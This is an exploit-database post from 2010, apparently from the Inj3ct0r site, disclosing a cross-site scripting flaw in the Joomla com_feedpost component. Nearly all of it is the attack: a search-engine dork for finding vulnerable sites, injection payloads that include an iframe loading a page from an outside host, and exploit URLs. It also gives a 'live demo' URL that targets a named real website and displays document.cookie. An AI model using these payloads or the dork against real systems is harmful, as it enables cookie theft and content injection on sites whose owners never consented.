Joomla Component com_feedpost XSS vulnerability
Posted on 17 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Joomla Component com_feedpost XSS vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=============================================== Joomla Component com_feedpost XSS vulnerability =============================================== # Exploit Title: Joomla com_feedpost XSS vulnerability # Date : 17 june 2010 # Author : x0kster (x0kster@gmail.com) # Dork : inurl:"feedpost.php?url=" ==== XSS EXPLOIT ==== HTML INJECTION: <iframe src=http://own.com/lol.html < ALERT XSS : <body onload=alert('xss')> GENERAL XSS : <body onload=JAVASCRIP_HERE> ==== VULN IN HERE ==== http://localhost/joomla/components/com_feedpostold/feedpost.php?url=[XSS] Examples: http://localhost/joomla/components/com_feedpostold/feedpost.php?url=<iframe src=http://own.com/lol.html < http://localhost/joomla/components/com_feedpostold/feedpost.php?url=<body onload=alert('Inj3ct0r.com')> ==== LIVE DEMO ==== http://www.universinet.it/components/com_feedpostold/feedpost.php?url=<body onload=alert(document.cookie)> # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-17]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>